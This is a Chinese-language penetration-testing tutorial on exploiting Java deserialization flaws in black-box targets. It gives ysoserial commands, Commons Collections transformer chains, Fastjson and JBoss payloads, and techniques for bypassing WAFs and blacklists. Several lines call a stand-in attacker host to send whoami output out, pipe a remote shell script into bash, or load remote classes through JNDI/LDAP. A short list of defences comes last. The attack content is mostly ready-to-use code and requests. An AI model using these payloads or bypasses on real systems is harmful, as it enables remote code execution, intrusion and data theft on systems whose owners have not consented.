Java反序列化漏洞黑盒实战技巧<\/h1>

一、入口点发现技巧<\/h2>

1. 协议特征识别<\/h3>

Java原生序列化<\/h4>

特征头<\/strong>：AC ED 00 05<\/code>（魔数头）<\/li>

HTTP请求示例<\/strong>： POST \/api\/data HTTP\/1.1 Content-Type: application\/x-java-serialized-object [HEX] AC ED 00 05 73 72 00 ... <\/code><\/pre> <\/li> <\/ul> XML序列化<\/h4> 特征<\/strong>：包含java serialization="1.0"<\/code>声明<\/li> 示例<\/strong>： <java<\/span> serialization=<\/span>"1.0"<\/span>><\/span> <\/span><\/span> <object<\/span> class=<\/span>"java.util.HashMap"<\/span>><\/span> <\/span><\/span> <field<\/span> name=<\/span>"user"<\/span> class=<\/span>"com.example.User"<\/span>><\/span> <\/span><\/span> <string><\/span>test<\/string><\/span> <\/span><\/span> <\/field><\/span> <\/span><\/span> <\/object><\/span> <\/span><\/span><\/java><\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> JSON特殊格式<\/h4> 可能包含特殊构造的JSON对象，用于触发反序列化<\/li> <\/ul> 2. 常见渗透路径<\/h3> graph LR A[HTTP请求] --> B[参数污染] A --> C[Cookie篡改] A --> D[文件上传] E[JMX端口] --> F[1099端口探测] G[RMI服务] --> H[远程对象绑定] <\/code><\/pre> 二、漏洞检测手法<\/h2> 1. 盲打检测法<\/h3> 使用DNSLOG检测<\/strong>： java -jar ysoserial.jar URLDNS "http:\/\/xxxxxx.dnslog.cn"<\/span> > payload.bin <\/span><\/span>curl -X POST --data-binary @payload.bin http:\/\/target.com\/api <\/span><\/span><\/code><\/pre><\/li> 观察DNS解析记录确认漏洞<\/li> <\/ul> 2. 延时检测法<\/h3> 构造触发sleep的payload<\/strong>： Transformer[]<\/span> chain =<\/span> {<\/span> <\/span><\/span> new<\/span> ConstantTransformer(<\/span>Thread.<\/span>class<\/span>),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"sleep"<\/span>,<\/span> new<\/span> Class[]{<\/span>Long.<\/span>TYPE<\/span>}}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span> new<\/span> Object[]{<\/span>5000<\/span>}})<\/span> <\/span><\/span>};<\/span> <\/span><\/span><\/code><\/pre><\/li> 判断标准<\/strong>：正常请求响应时间：200ms<\/li> 成功触发后响应时间：>5000ms<\/li> <\/ul> <\/li> <\/ul> 3. 错误信息分析<\/h3> 关键错误特征<\/strong>： HTTP\/1.1 500 Internal Server Error Content-Type: text\/plain java.io.InvalidClassException: org.apache.commons.collections.functors.InvokerTransformer; local class incompatible: stream classdesc serialVersionUID = -8653385846894807688... <\/code><\/pre> <\/li> 关注点<\/strong>：出现InvokerTransformer<\/code>、AnnotationInvocationHandler<\/code>等类名<\/li> InvalidClassException<\/code>中包含CC组件信息<\/li> <\/ul> <\/li> <\/ul> 三、协议级渗透技巧<\/h2> 1. RMI服务探测<\/h3> 使用nmap扫描<\/strong>： nmap -p 1099<\/span> --script rmi-vuln-classloader 192.168.1.100 <\/span><\/span><\/code><\/pre><\/li> 强制绑定恶意对象<\/strong>： String server =<\/span> "rmi:\/\/192.168.1.100:1099\/Exploit"<\/span>;<\/span> <\/span><\/span>Naming.<\/span>bind<\/span>(<\/span>server,<\/span> new<\/span> MaliciousObject());<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 2. JMX攻击<\/h3> 构造JMX连接payload<\/strong>： JMXServiceURL url =<\/span> new<\/span> JMXServiceURL(<\/span> <\/span><\/span> "service:jmx:rmi:\/\/\/jndi\/rmi:\/\/attacker.com:1099\/exploit"<\/span>);<\/span> <\/span><\/span>JMXConnector connector =<\/span> JMXConnectorFactory.<\/span>connect<\/span>(<\/span>url);<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 3. HTTP参数注入<\/h3> 示例请求<\/strong>： POST \/exportData HTTP\/1.1 Content-Type: multipart\/form-data --boundary Content-Disposition: form-data; name="config" rO0ABXNyADRjb20uZXhhbXBsZS5TZXJpYWxpemFibGVDb25maWg... # 序列化对象 <\/code><\/pre> <\/li> <\/ul> 四、高级绕过检测<\/h2> 1. 协议伪装技巧<\/h3> 将序列化数据嵌入JSON<\/strong>： import<\/span> base64 <\/span><\/span>payload =<\/span> open('payload.bin'<\/span>, 'rb'<\/span>).<\/span>read() <\/span><\/span>wrapped =<\/span> { <\/span><\/span> "data"<\/span>: { <\/span><\/span> "type"<\/span>: "base64"<\/span>, <\/span><\/span> "value"<\/span>: base64.<\/span>b64encode(payload).<\/span>decode() <\/span><\/span> } <\/span><\/span>} <\/span><\/span>requests.<\/span>post(url, json=<\/span>wrapped) <\/span><\/span><\/code><\/pre><\/li> <\/ul> 2. 字符集混淆<\/h3> 使用多种编码绕过WAF<\/strong>： String[]<\/span> encodings =<\/span> {<\/span>"UTF-16BE"<\/span>,<\/span> "UTF-32"<\/span>,<\/span> "x-COMPOUND_TEXT"<\/span>};<\/span> <\/span><\/span>ByteArrayOutputStream bos =<\/span> new<\/span> ByteArrayOutputStream();<\/span> <\/span><\/span>ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>bos);<\/span> <\/span><\/span>oos.<\/span>writeObject<\/span>(<\/span>payload);<\/span> <\/span><\/span>for<\/span> (<\/span>String enc :<\/span> encodings)<\/span> {<\/span> <\/span><\/span> String encoded =<\/span> new<\/span> String(<\/span>bos.<\/span>toByteArray<\/span>(),<\/span> enc);<\/span> <\/span><\/span> sendTestRequest(<\/span>encoded);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 3. 分块传输绕过<\/h3> 示例请求<\/strong>： POST \/api\/upload HTTP\/1.1 Transfer-Encoding: chunked 7 \xac\xed\x00\x05 0 ...后续chunk携带剩余payload... <\/code><\/pre> <\/li> <\/ul> 五、工具链配置<\/h2> 1. Burp Suite插件配置<\/h3> 自动检测Java序列化<\/strong>： from<\/span> burp import<\/span> IBurpExtender <\/span><\/span>from<\/span> burp import<\/span> IScannerCheck <\/span><\/span> <\/span><\/span>class<\/span> BurpExtender<\/span>(IBurpExtender, IScannerCheck): <\/span><\/span> def<\/span> doPassiveScan<\/span>(self, baseRequestResponse): <\/span><\/span> data =<\/span> baseRequestResponse.<\/span>getRequest() <\/span><\/span> if<\/span> b<\/span>'<\/span>\xac\xed\x00\x05<\/span>'<\/span> in<\/span> data: <\/span><\/span> return<\/span> [CustomScanIssue( <\/span><\/span> baseRequestResponse.<\/span>getHttpService(), <\/span><\/span> "Java Serialization Detected"<\/span>, <\/span><\/span> "Possible insecure deserialization"<\/span>)] <\/span><\/span><\/code><\/pre><\/li> <\/ul> 2. 自动化检测脚本<\/h3> 批量生成CC变种payload<\/strong>： #!\/bin\/bash <\/span><\/span><\/span><\/span>TARGET=<\/span>$1 <\/span><\/span>for<\/span> gadget in {<\/span>1..10}<\/span>; do<\/span> <\/span><\/span> java -jar ysoserial.jar CommonsCollections$gadget "nslookup <\/span>$gadget.xxx.dnslog.cn"<\/span> > payload$gadget.bin <\/span><\/span> curl -X POST --data-binary @payload$gadget.bin $TARGET <\/span><\/span>done<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 六、漏洞确认与利用<\/h2> 1. 回显验证<\/h3> 构造命令执行回显payload<\/strong>： String cmd =<\/span> "curl http:\/\/attacker.com\/$(whoami|base64)"<\/span>;<\/span> <\/span><\/span>Transformer[]<\/span> chain =<\/span> {<\/span> <\/span><\/span> new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> ...),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>cmd})<\/span> <\/span><\/span>};<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 2. 内存马注入验证<\/h3> 检测表达式解析<\/strong>： GET \/favicon.ico HTTP\/1.1 Host: target.com X-Token: ${@Runtime@getRuntime().exec("calc")} <\/code><\/pre> <\/li> <\/ul> 七、防御方案验证<\/h2> 1. 安全配置检查<\/h3> 测试反序列化过滤<\/strong>： curl -v -X POST --data 'rO0ABXNy...'<\/span> -H "Content-Type: application\/x-java-serialized-object"<\/span> http:\/\/target.com\/api <\/span><\/span><\/code><\/pre><\/li> 预期安全响应<\/strong>： HTTP\/1.1 403 Forbidden Content-Type: application\/json {"error":"Unsupported media type"} <\/code><\/pre> <\/li> <\/ul> 2. WAF规则测试<\/h3> 测试WAF拦截能力<\/strong>： payloads =<\/span> [ <\/span><\/span> b<\/span>'InvokerTransformer'<\/span>, <\/span><\/span> b<\/span>'AnnotationInvocationHandler'<\/span>, <\/span><\/span> b<\/span>'<\/span>\xac\xed\x00\x05<\/span>'<\/span> <\/span><\/span>] <\/span><\/span>for<\/span> p in<\/span> payloads: <\/span><\/span> r =<\/span> requests.<\/span>post(url, data=<\/span>p) <\/span><\/span> if<\/span> r.<\/span>status_code !=<\/span> 403<\/span>: <\/span><\/span> print(f<\/span>"Bypass found: <\/span>{<\/span>p[:20<\/span>]}<\/span>..."<\/span>) <\/span><\/span><\/code><\/pre><\/li> <\/ul> 总结与思维导图<\/h2> graph TD A[黑盒测试流程] --> B[流量捕获] A --> C[特征识别] A --> D[Payload构造] A --> E[异常检测] B --> F[BurpSuite历史记录] C --> G[AC ED头检测] D --> H[Ysoserial生成] E --> I[响应时间分析] E --> J[错误信息匹配] E --> K[DNSLOG回调] <\/code><\/pre> 核心要点<\/strong>：<\/p> 通过协议特征快速锁定可疑端点<\/li> 结合多种检测手法相互验证<\/li> 关注非常规协议端口(RMI\/JMX\/JNDI)<\/li> 持续更新payload绕过最新防御措施<\/li> <\/ol> 反序列化的深度技巧<\/h2> 1. 基于协议特征的深度检测<\/h3> DNS\/ICMP 双通道验证<\/h4> 组合DNS查询与ICMP回显<\/strong>： # 生成DNS探测payload<\/span> <\/span><\/span>dns_log =<\/span> "yourdomain.dnslog.cn"<\/span> <\/span><\/span>payload =<\/span> os.<\/span>popen(f<\/span>'java -jar ysoserial.jar URLDNS <\/span>{<\/span>dns_log}<\/span>'<\/span>).<\/span>read() <\/span><\/span>requests.<\/span>post(target_url, data=<\/span>payload) <\/span><\/span> <\/span><\/span># 监听ICMP<\/span> <\/span><\/span>from<\/span> scapy.all import<\/span> *<\/span> <\/span><\/span>def<\/span> icmp_callback<\/span>(pkt): <\/span><\/span> if<\/span> pkt.<\/span>haslayer(ICMP) and<\/span> pkt[ICMP].<\/span>type ==<\/span> 8<\/span>: <\/span><\/span> print(f<\/span>"ICMP Echo Request from <\/span>{<\/span>pkt[IP].<\/span>src}<\/span>"<\/span>) <\/span><\/span>sniff(filter=<\/span>"icmp"<\/span>, prn=<\/span>icmp_callback, timeout=<\/span>30<\/span>) <\/span><\/span><\/code><\/pre><\/li> 原理<\/strong>： URLDNS链触发DNS解析<\/li> 若网络限制DNS外连，改用CommonsCollections5构造ping命令触发ICMP<\/li> <\/ul> <\/li> <\/ul> 2. 非常规协议伪装<\/h3> HTTP参数嵌套Base64<\/h4> import<\/span> base64 <\/span><\/span>with<\/span> open("payload.bin"<\/span>, "rb"<\/span>) as<\/span> f: <\/span><\/span> serialized_data =<\/span> f.<\/span>read() <\/span><\/span>wrapped_payload =<\/span> { <\/span><\/span> "data"<\/span>: { <\/span><\/span> "type"<\/span>: "binary"<\/span>, <\/span><\/span> "content"<\/span>: base64.<\/span>b64encode(serialized_data).<\/span>decode() <\/span><\/span> } <\/span><\/span>} <\/span><\/span>requests.<\/span>post("http:\/\/target\/api\/upload"<\/span>, json=<\/span>wrapped_payload) <\/span><\/span><\/code><\/pre> 特征伪装<\/strong>：原始特征rO0AB<\/code>被Base64编码为ck8wQUI=<\/code>，绕过简单正则<\/li> <\/ul> Multipart表单注入<\/h4> files =<\/span> { <\/span><\/span> 'file'<\/span>: ('payload.bin'<\/span>, open('payload.bin'<\/span>, 'rb'<\/span>), <\/span><\/span> 'application\/x-java-serialized-object'<\/span>) <\/span><\/span>} <\/span><\/span>requests.<\/span>post("http:\/\/target\/upload"<\/span>, files=<\/span>files) <\/span><\/span><\/code><\/pre> 检测点<\/strong>：观察Content-Type: multipart\/form-data<\/code>中的序列化数据<\/li> <\/ul> 3. 中间件特性利用<\/h3> JBoss httpinvoker漏洞利用<\/h4> Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span> <\/span><\/span> new<\/span> ConstantTransformer(<\/span>javax.<\/span>management<\/span>.<\/span>MBeanServerConnection<\/span>.<\/span>class<\/span>),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"getAttribute"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>ObjectName.<\/span>class<\/span>,<\/span> String.<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>new<\/span> ObjectName(<\/span>"jboss.system:type=Server"<\/span>),<\/span> "StartTime"<\/span>}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"toString"<\/span>,<\/span> null<\/span>,<\/span> null<\/span>)<\/span> <\/span><\/span>};<\/span> <\/span><\/span><\/code><\/pre> 触发点<\/strong>：发送payload至\/invoker\/readonly<\/code>端点，利用MBean操作执行命令<\/li> <\/ul> 4. 时序攻击与条件竞争<\/h3> 延迟注入检测<\/h4> import<\/span> time <\/span><\/span>payloads =<\/span> [ <\/span><\/span> generate_sleep_payload(5<\/span>), # 生成触发Thread.sleep(5000)的payload<\/span> <\/span><\/span> generate_dummy_payload() <\/span><\/span>] <\/span><\/span>for<\/span> p in<\/span> payloads: <\/span><\/span> start =<\/span> time.<\/span>time() <\/span><\/span> requests.<\/span>post(target_url, data=<\/span>p) <\/span><\/span> elapsed =<\/span> time.<\/span>time() -<\/span> start <\/span><\/span> if<\/span> elapsed ><\/span> 4.5<\/span>: <\/span><\/span> print(f<\/span>"Potential vulnerability detected with payload <\/span>{<\/span>p}<\/span>"<\/span>) <\/span><\/span><\/code><\/pre> 原理<\/strong>：成功触发漏洞时服务器会执行sleep导致响应延迟<\/li> <\/ul> 5. 非标准端口探测<\/h3> JMX端口(1099)探测<\/h4> nmap -p 1099<\/span> --script rmi-dumpregistry <target_ip> <\/span><\/span><\/code><\/pre>String jmxUrl =<\/span> "service:jmx:rmi:\/\/\/jndi\/rmi:\/\/attacker_ip:1099\/Exploit"<\/span>;<\/span> <\/span><\/span>JMXConnector connector =<\/span> JMXConnectorFactory.<\/span>connect<\/span>(<\/span>new<\/span> JMXServiceURL(<\/span>jmxUrl));<\/span> <\/span><\/span><\/code><\/pre> 利用场景<\/strong>：JMX默认使用RMI协议，未配置安全策略时可直连执行命令<\/li> <\/ul> 6. 防御绕过技巧<\/h3> 动态类加载混淆<\/h4> Transformer[]<\/span> chain =<\/span> {<\/span> <\/span><\/span> new<\/span> ConstantTransformer(<\/span>URLClassLoader.<\/span>class<\/span>),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"newInstance"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>URL[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>new<\/span> URL[]{<\/span>new<\/span> URL(<\/span>"http:\/\/attacker.com\/"<\/span>)}}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"loadClass"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"Exploit"<\/span>}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"newInstance"<\/span>,<\/span> null<\/span>,<\/span> null<\/span>)<\/span> <\/span><\/span>};<\/span> <\/span><\/span><\/code><\/pre> 绕过效果<\/strong>：避免直接引用危险类(如Runtime)，绕过静态黑名单检测<\/li> <\/ul> 典型案例分析<\/h2> 案例1：Apache Commons Collections反序列化漏洞<\/h3> 利用条件<\/strong>：<\/p> 目标使用ACC 3.1-3.2.1或4.0-4.1版本<\/li> 存在未过滤的反序列化入口<\/li> <\/ul> 攻击步骤<\/strong>：<\/p> 构造利用链： Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]<\/span> {<\/span> <\/span><\/span> new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> null<\/span>}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span> null<\/span>}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"calc.exe"<\/span>})<\/span> <\/span><\/span>};<\/span> <\/span><\/span><\/code><\/pre><\/li> 通过TransformedMap<\/code>和AnnotationInvocationHandler<\/code>触发链式调用<\/li> 生成Payload并注入目标参数<\/li> <\/ol> 案例2：Fastjson 1.2.24反序列化漏洞<\/h3> 利用条件<\/strong>：<\/p> 使用Fastjson ≤1.2.24<\/li> 未配置autoTypeCheck<\/code><\/li> <\/ul> 攻击步骤<\/strong>：<\/p> 构造恶意JSON： { <\/span><\/span> "@type"<\/span>:"com.sun.rowset.JdbcRowSetImpl"<\/span>, <\/span><\/span> "dataSourceName"<\/span>:"ldap:\/\/attacker.com\/Exploit"<\/span>, <\/span><\/span> "autoCommit"<\/span>:true<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> 触发JNDI注入加载远程类<\/li> <\/ol> 案例3：JBoss JMXInvokerServlet漏洞<\/h3> 利用条件<\/strong>：<\/p> JBoss ≤6.x<\/li> JMXInvokerServlet可访问<\/li> <\/ul> 攻击步骤<\/strong>：<\/p> 生成Payload： java -jar ysoserial.jar CommonsCollections1 "curl http:\/\/attacker.com\/shell.sh | bash"<\/span> > payload.bin <\/span><\/span><\/code><\/pre><\/li> 发送至目标接口： POST \/invoker\/JMXInvokerServlet HTTP\/1.1 Content-Type: application\/x-java-serialized-object [payload.bin内容] <\/code><\/pre> <\/li> <\/ol> 防御建议<\/h2> 技术措施<\/strong>：<\/p> 启用SerialKiller<\/code>等安全反序列化库<\/li> 配置JVM安全策略限制敏感操作<\/li> 升级存在漏洞的第三方库<\/li> <\/ul> <\/li> 配置管理<\/strong>：<\/p> 关闭不必要的RMI\/JMX端口<\/li> 配置输入验证和白名单机制<\/li> 禁用危险的序列化功能<\/li> <\/ul> <\/li> 监控检测<\/strong>：<\/p> 监控异常反序列化操作<\/li> 部署WAF规则检测常见攻击特征<\/li> 定期进行安全审计和渗透测试<\/li> <\/ul> <\/li> <\/ol>